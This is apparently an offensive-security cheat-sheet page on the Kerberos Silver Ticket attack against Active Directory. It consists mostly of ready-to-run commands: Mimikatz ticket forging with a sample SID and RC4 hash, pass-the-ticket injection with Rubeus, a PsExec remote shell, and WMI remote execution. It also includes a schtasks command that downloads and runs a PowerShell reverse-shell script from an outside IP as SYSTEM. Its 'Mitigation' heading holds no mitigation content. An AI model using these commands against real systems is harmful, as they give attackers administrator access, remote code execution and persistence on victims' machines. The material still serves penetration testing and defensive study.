The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of service is owned (like the PC account hash). Thus, it is possible to gain access to that service by forging a custom TGS as any user.
In this case, the NTLM hash of a computer account (which is kind of a user account in AD) is owned. Hence, it is possible to craft a ticket in order to get into that machine with administrator privileges through the SMB service. The computer accounts reset their passwords every 30 days by default.
It also must be taken into account that it is possible to forge tickets using the AES Kerberos keys (AES128 and AES256). To know how to generate an AES key read: section 4.4 of MS-KILE or the Get-KerberosAESKey.ps1.
In Windows, Mimikatz can be used to craft the ticket. Next, the ticket is injected with Rubeus, and finally a remote shell can be obtained thanks to PsExec.
Windows
#Create the ticketmimikatz.exe"kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park"#Inject in memory using mimikatz or Rubeusmimikatz.exe"kerberos::ptt ticket.kirbi".\Rubeus.exeptt/ticket:ticket.kirbi#Obtain a shell.\PsExec.exe-accepteula\\labwws02.jurassic.parkcmd
The CIFS service is the one that allows you to access the file system of the victim. You can find other services here: https://adsecurity.org/?page_id=183. For example, you can use the HOST service to create a schtask in a computer. Then you can check if this has worked trying to list the tasks of the victim: schtasks /S <hostname> or you can use the HOST andRPCSS service to execute WMI queries in a computer, test it doing: Get-WmiObject -Class win32_operatingsystem -ComputerName <hostname>
Mitigation
Silver ticket events ID (more stealth than golden ticket):
In the following examples lets imagine that the ticket is retrieved impersonating the administrator account.
CIFS
With this ticket you will be able to access the C$ and ADMIN$ folder via SMB (if they are exposed) and copy files to ay part of the remote filesystem just doing something like:
You will also be able to obtain a shell inside the host or execute arbitrary commands using psexec:
dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp
#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekely /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekely /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"
#You can also use wmic
wmic remote.computer.local list full /format:list